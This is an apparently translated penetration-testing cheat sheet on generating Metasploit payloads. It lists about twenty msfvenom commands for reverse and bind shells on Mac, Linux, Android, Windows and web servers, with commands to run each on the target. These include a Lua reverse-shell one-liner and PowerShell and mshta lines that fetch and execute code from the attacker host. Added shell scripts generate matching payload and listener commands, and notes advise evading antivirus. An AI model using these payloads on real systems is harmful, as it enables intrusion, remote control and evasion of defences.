- (1) Commonly used advanced options
- (2) Generating common payloads
- 1. Mac reverse_tcp macho
- 2. Linux reverse_tcp elf
- 3. Android reverse_tcp apk
- 4. Windows reverse_tcp exe
- 5. Windows bind_tcp exe
- 6. Windows reverse_https exe
- 7. Windows reverse_tcp dll
- 8. Windows reverse_tcp jar
- 9. Script reverse_tcp aspx
- 10. Script reverse_tcp php
- 11. Script reverse_tcp jsp
- 12. Script reverse_tcp perl
- 13. Script reverse_tcp ruby
- 14. Script reverse_tcp python
- 15. Script reverse_lua lua
- 16. Script reverse_bash bash
- 17. Script reverse_tcp nodejs
- 18. Bypass hta_server mshta
- 19. Bypass web_delivery powershell
- 20. Bypass reverse_https PowerShell
- (3) Notes
(1) Commonly used advanced options
The options below are the ones the author uses most; pick what fits the target and your own needs. More advanced options are listed in my "Metasploit common commands quick reference". Test everything yourself, because only after you have tried an option do you know its real effect!
LHOST: attacker (local) IP address; RHOST: target (remote) IP address; LPORT: the listening port (on the attacker for reverse payloads, on the target for bind payloads)
EXITFUNC: how the payload exits. EXITFUNC=process terminates the host process, EXITFUNC=thread terminates only the payload's thread (use thread when the payload runs inside a process you want to keep alive)
set PrependMigrate true               spawn a new process and migrate into it before the stage runs (default: false)
set PrependMigrateProc explorer.exe   name of the process to spawn and migrate into: explorer.exe
set SessionExpirationTimeout 0        seconds until the session expires, 0 = never (default: 604800, i.e. 7 days)
set SessionCommunicationTimeout 0     seconds of silence before the session is considered dead, 0 = never (default: 300)
set EnableStageEncoding true          encode the stage before the handler sends it to the stager (default: false)
set EnableUnicodeEncoding true        automatically encode UTF-8 strings as hexadecimal in the session (default: false)
set StageEncoder x86/fnstenv_mov      encoder used for the stage: x86/fnstenv_mov (must match the payload architecture; an x64 payload needs an x64 encoder)
set HandlerSSLCert /tmp/772023.pem    PEM file (certificate plus private key) that the HTTPS handler presents
set StagerVerifySSLCert true          have the stager verify (pin) the handler's certificate; requires HandlerSSLCert, and the same PEM must be given to msfvenom and to the handler
set ExitOnSession false               keep listening after the first session instead of exiting (default: true)
set AutoRunScript migrate -f          run the migrate script on every new session; -f spawns a fresh process to migrate into, -n <name> migrates into a process with that name
set InitialAutoRunScript migrate -f   same, but runs before AutoRunScript
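The options above are split across two tools, and a common mistake is to set a handler-side option on the msfvenom command line, or to start the handler with a different payload, port or certificate than the stager was built with. The following POSIX shell script is an added example, not code from the original post or from Metasploit: it derives the msfvenom arguments and a matching exploit/multi/handler resource script from one set of inputs. The attacker address 192.168.1.120, port 443 and the certificate path /tmp/772023.pem are the post's illustrative values; the function names and the EXITFUNC=thread and x64/xor choices are this example's own assumptions.

```shell
#!/bin/sh
# Added example, not code from the original post: build the msfvenom
# arguments and the matching exploit/multi/handler resource script from ONE
# set of inputs so stager and listener agree on payload, port and certificate.
# Options are sorted by where they act: some are baked into the stager by
# msfvenom, others are applied by the handler when it serves the stage and
# runs the session. Host, port and PEM path are illustrative values.

# stager_args PAYLOAD HOST PORT [CERT.pem]  -> one KEY=VALUE per line for msfvenom
stager_args() {
  payload="$1"; host="$2"; port="$3"; cert="$4"
  case "$payload" in
    *bind_*)    ;;                                  # bind stager listens on the target: no LHOST
    *reverse_*) printf 'LHOST=%s\n' "$host" ;;
    *) printf 'stager_args: unsupported payload family: %s\n' "$payload" >&2; return 1 ;;
  esac
  printf 'LPORT=%s\n' "$port"
  printf 'EXITFUNC=thread\n'                        # end only our thread; the host process keeps running
  if [ -n "$cert" ]; then
    case "$payload" in
      *reverse_https*)
        # pinning is fixed at generation time: the stager embeds the cert hash,
        # so the handler must later be started with the same PEM file
        printf 'HandlerSSLCert=%s\nStagerVerifySSLCert=true\n' "$cert" ;;
    esac
  fi
  return 0
}

# msfvenom_cmd PAYLOAD HOST PORT FORMAT OUTFILE [CERT.pem] -> full command line
msfvenom_cmd() {
  args=$(stager_args "$1" "$2" "$3" "$6") || return 1
  printf 'msfvenom -p %s %s -f %s -o %s\n' "$1" "$(printf '%s' "$args" | tr '\n' ' ')" "$4" "$5"
}

# handler_rc PAYLOAD HOST PORT [CERT.pem] -> msfconsole resource script on stdout
handler_rc() {
  payload="$1"; host="$2"; port="$3"; cert="$4"
  printf 'use exploit/multi/handler\n'
  printf 'set PAYLOAD %s\n' "$payload"
  case "$payload" in
    *bind_*)    printf 'set RHOST %s\n' "$host" ;;  # handler connects out to the target's bound port
    *reverse_*) printf 'set LHOST %s\n' "$host" ;;
    *) printf 'handler_rc: unsupported payload family: %s\n' "$payload" >&2; return 1 ;;
  esac
  printf 'set LPORT %s\n' "$port"
  if [ -n "$cert" ]; then
    case "$payload" in
      *reverse_https*) printf 'set HandlerSSLCert %s\n' "$cert" ;;
    esac
  fi
  case "$payload" in
    windows/*meterpreter*)
      # stage encoding happens when the handler sends the stage, so the
      # encoder must match the stage architecture rather than be copied blindly
      printf 'set EnableStageEncoding true\n'
      case "$payload" in
        */x64/*) printf 'set StageEncoder x64/xor\n' ;;
        *)       printf 'set StageEncoder x86/fnstenv_mov\n' ;;
      esac ;;
  esac
  case "$payload" in
    *meterpreter*)
      # session options are applied by the handler, not by msfvenom
      printf 'set SessionCommunicationTimeout 0\n'
      printf 'set SessionExpirationTimeout 0\n'
      printf 'set InitialAutoRunScript migrate -f\n' ;;
  esac
  printf 'set ExitOnSession false\n'
  printf 'exploit -j -z\n'
}

# Demo: the reverse_https stager with a pinned certificate and its handler
msfvenom_cmd windows/x64/meterpreter/reverse_https 192.168.1.120 443 exe /tmp/https.exe /tmp/772023.pem
handler_rc   windows/x64/meterpreter/reverse_https 192.168.1.120 443 /tmp/772023.pem
```

Save the second output as handler.rc and start it with msfconsole -q -r handler.rc. For a bind payload the script emits RHOST instead of LHOST, because the handler is the side that connects; for HTTPS the same PEM appears in both outputs, which is what StagerVerifySSLCert needs.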
(2) Generating common payloads
Note on item 8 below: the Windows reverse_tcp jar payload can only be executed from a webshell when the IIS application pool runs as one of the built-in accounts LocalService, LocalSystem or NetworkService; with ApplicationPoolIdentity or a custom account it does not run.
1. Mac reverse_tcp macho
root@kali:~# msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.120 LPORT=443 -f macho > /tmp/mac.macho
2. Linux reverse_tcp elf
root@kali:~# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f elf > /tmp/linux.elf
3. Android reverse_tcp apk
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/android.apk
4. Windows reverse_tcp exe
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f exe > /tmp/reverse.exe
5. Windows bind_tcp exe
root@kali:~# msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=999 -f exe > /tmp/bind.exe
6. Windows reverse_https exe
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.120 LPORT=443 -f exe > /tmp/https.exe
Run on the target (an EXE is started directly; rundll32 only loads DLLs and will not run it): C:\inetpub\wwwroot\> C:\ProgramData\https.exe
7. Windows reverse_tcp dll
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f dll > /tmp/dll_x64.dll
Run on the target: C:\inetpub\wwwroot\> rundll32 C:\ProgramData\dll_x64.dll,Start   or   regsvr32 /s C:\ProgramData\dll_x64.dll (the msfvenom DLL template runs the payload from DllMain when the DLL is loaded, so the export name after the comma is irrelevant; rundll32 will complain about the missing entry point after the payload is already running)
8. Windows reverse_tcp jar
root@kali:~# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f jar > /tmp/java.jar
Run on the target: C:\inetpub\wwwroot\> java -jar "C:\ProgramData\java.jar"
9. Script reverse_tcp aspx
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f aspx > /tmp/aspxweb.aspx
Open in a browser: http://192.168.1.108/aspxweb.aspx (192.168.1.108 is the target web server; 192.168.1.120 is the attacker running the handler)
10. Script reverse_tcp php
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/phpweb.php
msfvenom emits the PHP with the opening tag commented out (/*<?php /**/), so prepend a real opening tag before uploading:
root@kali:~# (echo '<?php '; cat /tmp/phpweb.php) > /tmp/shell.php
Open in a browser: http://192.168.1.108/shell.php
11. Script reverse_tcp jsp
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/jspweb.jsp
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.120 LPORT=443 -f war > /tmp/warweb.war   (WAR archive, for deployment into a servlet container such as Tomcat)
Open in a browser: http://192.168.1.108:8080/jspweb.jsp
12. Script reverse_tcp perl
root@kali:~# msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/perl.pl
Run on the target: [/var/www/html/]$ perl /tmp/perl.pl
13. Script reverse_tcp ruby
root@kali:~# msfvenom -p cmd/unix/reverse_ruby LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/ruby.rb
Run on the target: [/var/www/html/]$ ruby /tmp/ruby.rb
14. Script reverse_tcp python
root@kali:~# msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/python.py
Run on the target: [/var/www/html/]$ python /tmp/python.py
15. Script reverse_lua lua
root@kali:~# msfvenom -p cmd/unix/reverse_lua LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/payload.lua
Run on the target (the generated file contains this one-liner, which requires the LuaSocket module on the target):
[/var/www/html/]$ lua -e "local s=require('socket');local t=assert(s.tcp());t:connect('192.168.1.120',443);while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();"
16. Script reverse_bash bash
root@kali:~# msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/payload.sh
Run on the target: [/var/www/html/]$ bash /tmp/payload.sh
17. Script reverse_tcp nodejs
root@kali:~# msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/payload.js
Run on the target: [/var/www/html/]$ nodejs /tmp/payload.js   (use node on systems where the binary is not named nodejs)
18. Bypass hta_server mshta
msf > use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set target 1
msf exploit(windows/misc/hta_server) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.120
msf exploit(windows/misc/hta_server) > set lport 443
msf exploit(windows/misc/hta_server) > exploit
Run on the target (the .hta path is randomized on every run and printed by the module when it starts):
C:\inetpub\wwwroot\> mshta http://192.168.1.120:8080/xc2Pvkpa3FU6Q.hta
19. Bypass web_delivery powershell
msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 2
msf exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.1.120
msf exploit(multi/script/web_delivery) > set lport 443
msf exploit(multi/script/web_delivery) > set uripath /
msf exploit(multi/script/web_delivery) > exploit
Run on the target (the module prints this one-liner when it starts; copy it verbatim):
C:\inetpub\wwwroot\> powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://192.168.1.120:8080/');
20. Bypass reverse_https PowerShell
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.120 LPORT=443 -f psh-reflection > /var/www/html/Powershell.ps1
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set lhost 192.168.1.120
msf exploit(multi/handler) > set lport 443
msf exploit(multi/handler) > exploit
Run on the target (the .ps1 is fetched over plain HTTP from the attacker's web root; only the Meterpreter session itself uses HTTPS on port 443):
C:\inetpub\wwwroot\> powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.120/Powershell.ps1'); "
(3) Notes
- Check whether the target is 32-bit or 64-bit before choosing a payload (for example with systeminfo on Windows or uname -m on Linux); only a payload of the correct architecture will run;
- At the time of writing, the 64-bit payload files generated by Metasploit evaded detection by Sophos Anti-Virus without any modification; AV coverage changes with every signature update, so re-test against the current engine before relying on this;
- If a firewall on the target blocks outbound TCP connections to the attacking machine, try a bind_tcp payload instead (this in turn requires that an inbound connection to the chosen port is allowed);
- If the target is in an internal network protected by antivirus, uploaded tools such as port forwarders tend to be quarantined; use the script payloads above to avoid dropping binaries.
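The first note matters more than it looks: windows/meterpreter/reverse_tcp (item 4) produces an x86 executable while windows/x64/meterpreter/... produces x64, and a wrong-architecture file simply fails without a message. The following POSIX shell check is an added example, not code from the original post: it reads the PE (exe/dll) or ELF header of a generated file with od and reports its architecture, so the artifact can be confirmed before upload. The minimal PE/ELF headers it builds for the demo are constructed test data, not real payloads.

```shell
#!/bin/sh
# Added example, not from the original post: report the architecture of a
# generated payload file from its PE (exe/dll) or ELF header using only od/dd,
# so an x86 artifact is not mistaken for an x64 one before upload.
# The sample headers built by make_pe/make_elf are constructed demo data.

# hexbytes FILE OFFSET COUNT -> bytes as one contiguous lowercase hex string
hexbytes() { od -An -tx1 -v -j"$2" -N"$3" "$1" | tr -d ' \n'; }

# le32 FILE OFFSET -> decimal value of a 4-byte little-endian field
le32() {
  h=$(hexbytes "$1" "$2" 4)
  [ ${#h} -eq 8 ] || return 1                   # truncated file
  b1=${h%??????}; rest=${h#??}                  # split "40000000" into byte pairs
  b2=${rest%????}; rest=${rest#??}
  b3=${rest%??};   b4=${rest#??}
  echo $((0x$b4$b3$b2$b1))                      # reverse byte order
}

# payload_arch FILE -> "PE x86", "PE x64", "ELF x64", ...; non-zero on unknown input
payload_arch() {
  f="$1"
  case "$(hexbytes "$f" 0 4)" in
    7f454c46)                                   # ELF: e_machine is the u16 at offset 0x12
      case "$(hexbytes "$f" 18 2)" in
        0300) echo "ELF x86" ;;
        3e00) echo "ELF x64" ;;
        2800) echo "ELF arm" ;;
        b700) echo "ELF aarch64" ;;
        *)    echo "ELF unknown"; return 1 ;;
      esac ;;
    4d5a*)                                      # MZ: e_lfanew at 0x3c points at "PE\0\0"
      off=$(le32 "$f" 60) || { echo "PE truncated"; return 1; }
      [ "$(hexbytes "$f" "$off" 4)" = "50450000" ] || { echo "PE bad signature"; return 1; }
      case "$(hexbytes "$f" $((off + 4)) 2)" in # IMAGE_FILE_HEADER.Machine, little-endian
        4c01) echo "PE x86" ;;
        6486) echo "PE x64" ;;
        64aa) echo "PE arm64" ;;
        *)    echo "PE unknown"; return 1 ;;
      esac ;;
    *) echo "not PE/ELF"; return 1 ;;
  esac
}

# Constructed minimal headers for the demo: only the fields inspected above.
# make_pe OUT MACHINE_OCTAL   e.g. '\144\206' = 0x8664 (x64), '\114\001' = 0x014c (x86)
make_pe() {
  {
    printf 'MZ'
    dd if=/dev/zero bs=1 count=58 2>/dev/null   # pad to e_lfanew at offset 0x3c
    printf '\100\000\000\000'                   # e_lfanew = 0x40
    printf 'PE\000\000'                         # PE signature at 0x40
    printf "$2"                                 # Machine field at 0x44
  } > "$1"
}
# make_elf OUT MACHINE_OCTAL  e.g. '\076\000' = 0x003e (x86-64), '\003\000' = 0x0003 (i386)
make_elf() {
  {
    printf '\177ELF'
    dd if=/dev/zero bs=1 count=14 2>/dev/null   # pad to e_machine at offset 0x12
    printf "$2"
  } > "$1"
}

# Demo. Real use: payload_arch /tmp/reverse.exe
demo() {
  d=$(mktemp -d)
  make_pe  "$d/x86.exe"   '\114\001'
  make_pe  "$d/x64.dll"   '\144\206'
  make_elf "$d/linux.elf" '\076\000'
  for f in "$d"/*; do printf '%s: %s\n' "$f" "$(payload_arch "$f")"; done
  rm -rf "$d"
}
demo
```

Run payload_arch on each file msfvenom produced and compare the result with the architecture of the target process you intend to run it in; "PE x86" for a file meant for a 64-bit IIS worker process means the wrong payload was chosen.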